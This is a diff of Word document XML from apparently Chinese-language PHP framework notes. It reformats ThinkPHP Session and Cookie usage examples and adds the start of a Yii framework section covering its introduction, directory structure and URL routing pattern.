+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3918,7 +3888,49 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>赋值</w:t>
+              <w:t>判断</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域下面是否赋值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::has('name',['think']);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>判断</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3941,15 +3953,76 @@
               </w:rPr>
               <w:t>)</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下面是否赋值</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:leftChars="145" w:left="304"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::get('name',['think']);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>取值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Session::prefix('think');  </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -3962,7 +4035,91 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>判断</w:t>
+              <w:t>指定当前作用域</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>Session::delete('name',['think']);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>删除</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下面的值</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="145" w:left="304"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Session::clear('think'); </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>清除</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3976,87 +4133,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>作用域下面是否赋值</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="145" w:left="304"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Session::has('name',</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>[</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'think'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>]</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>判断</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>think</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
               <w:t>作用域</w:t>
             </w:r>
             <w:r>
@@ -4064,303 +4140,10 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>下面是否赋值</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="145" w:left="304"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Session::get('name',</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>[</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'think'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>]</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>取值</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>think</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>作用域</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="145" w:left="304"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Session::prefix('think');</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>指定当前作用域</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="145" w:left="304"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Session::delete('name',</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>[</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'think'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>]</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>删除</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>think</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>作用域</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>下面的值</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="145" w:left="304"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>Session::clear('think');</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>清除</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>think</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>作用域</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
               <w:t>session</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -4466,22 +4249,11 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>// cookie</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   // cookie</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4493,9 +4265,6 @@
           <w:p>
             <w:pPr>
               <w:ind w:firstLineChars="150" w:firstLine="315"/>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
             </w:pPr>
             <w:r>
               <w:t>Cookie::init(</w:t>
@@ -4555,11 +4324,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -4602,8 +4366,6 @@
               </w:rPr>
               <w:t>)</w:t>
             </w:r>
-            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-            <w:bookmarkEnd w:id="0"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -9472,9 +9234,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9569,8 +9328,8 @@
               </w:rPr>
               <w:t xml:space="preserve">     </w:t>
             </w:r>
-            <w:bookmarkStart w:id="1" w:name="OLE_LINK1"/>
-            <w:bookmarkStart w:id="2" w:name="OLE_LINK2"/>
+            <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
+            <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -9800,8 +9559,8 @@
               <w:t>}</w:t>
             </w:r>
           </w:p>
+          <w:bookmarkEnd w:id="0"/>
           <w:bookmarkEnd w:id="1"/>
-          <w:bookmarkEnd w:id="2"/>
           <w:p>
             <w:r>
               <w:rPr>
@@ -10186,7 +9945,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10215,7 +9973,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10237,7 +9994,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10259,7 +10015,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10294,7 +10049,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10316,7 +10070,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10338,7 +10091,6 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -10358,11 +10110,6 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10381,7 +10128,2565 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>YII</w:t>
+      </w:r>
+      <w:r>
+        <w:t>框架</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>简介</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>入门</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a4"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="6439"/>
+        <w:gridCol w:w="6440"/>
+        <w:gridCol w:w="6440"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Yii </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是一个通用的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>编程框架，即可以用于开发各种用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> PHP </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>构建的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>应用。因为基于组件的框架结构和设计精巧的缓存支持，它特别适合开发大型应用，如门户网站、社区、内容管理系统（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>CMS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）、电子商务项目和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> RESTful Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>服务等</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Yii</w:t>
+            </w:r>
+            <w:r>
+              <w:t>主要目录结构：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A1ACF89" wp14:editId="1587755B">
+                  <wp:extent cx="3951605" cy="2154555"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="23" name="图片 23"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId28"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3951605" cy="2154555"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>URL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>访问</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>路径</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>https://www.barretren.com/ /YII/web/index.php?</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>r=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>控制器</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>操作名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>&amp;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>参数值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>]</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>控制器命名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>规则</w:t>
+            </w:r>
+            <w:r>
